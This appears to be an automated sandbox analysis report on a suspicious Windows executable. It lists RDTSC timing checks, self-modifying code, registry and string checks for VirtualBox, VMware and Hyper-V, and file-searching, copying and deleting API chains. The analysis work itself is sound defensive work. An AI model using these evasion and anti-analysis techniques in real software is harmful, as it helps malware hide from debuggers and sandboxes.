              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95F47 second address: B95F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D0Ch 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4648 second address: BA4652 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD184FDBE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA47AA second address: BA47B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA7904 second address: BA7908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB394 second address: BBB3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D0Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB3A7 second address: BBB3AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB57C second address: BBB580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB580 second address: BBB586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB586 second address: BBB5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD185A97D06h 0x0000000e jmp 00007FD185A97D0Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB6D4 second address: BBB6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FD184FDBE7Fh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB6EE second address: BBB6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB6F7 second address: BBB726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD184FDBE87h 0x00000008 jmp 00007FD184FDBE83h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB726 second address: BBB72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB9BD second address: BBB9D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD184FDBE7Eh 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jc 00007FD184FDBE76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB9D8 second address: BBB9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FD185A97D08h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBB54 second address: BBBBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FD184FDBE87h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f jns 00007FD184FDBE76h 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push edi 0x00000019 jmp 00007FD184FDBE7Ch 0x0000001e pop edi 0x0000001f jc 00007FD184FDBE90h 0x00000025 jmp 00007FD184FDBE84h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBE31 second address: BBBE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBE37 second address: BBBE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBE3B second address: BBBE51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBEFFE second address: BBF004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF004 second address: BBF057 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007FD185A97D19h 0x00000014 push 00000004h 0x00000016 mov dx, si 0x00000019 call 00007FD185A97D09h 0x0000001e pushad 0x0000001f jnp 00007FD185A97D0Ch 0x00000025 jne 00007FD185A97D08h 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF057 second address: BBF05D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF05D second address: BBF078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF078 second address: BBF08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e js 00007FD184FDBE76h 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF08D second address: BBF092 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF092 second address: BBF0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnl 00007FD184FDBE91h 0x0000000f push edx 0x00000010 jmp 00007FD184FDBE89h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FD184FDBE76h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF0CA second address: BBF0E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF0E7 second address: BBF0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC066E second address: BC0674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0674 second address: BC0678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0678 second address: BC0698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD185A97D17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0698 second address: BC06B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD184FDBE80h 0x0000000e jl 00007FD184FDBE76h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC06B7 second address: BC06BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC21EA second address: BC21F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1D8B second address: BC1D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1D91 second address: BC1DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE88h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1DAD second address: BC1DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD185A97D0Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1DC3 second address: BC1DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10250 second address: 4E10256 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10256 second address: 4E1025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1025C second address: 4E10260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10260 second address: 4E1027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD184FDBE7Bh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1027B second address: 4E1027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1027F second address: 4E10285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10285 second address: 4E1028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1028B second address: 4E1028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1037C second address: 4E10382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10382 second address: 4E10386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10386 second address: 4E1038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8C74 second address: AD8C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8EFD second address: AD8F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 91FB27 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 91D5BE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AF1FA2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ADDDAA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B56C6B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27852
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-27925
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_006E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_006EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006D16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_006F1BF0
              Source: file.exe, file.exe, 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2220139315.0000000001075000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2220139315.0000000001045000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
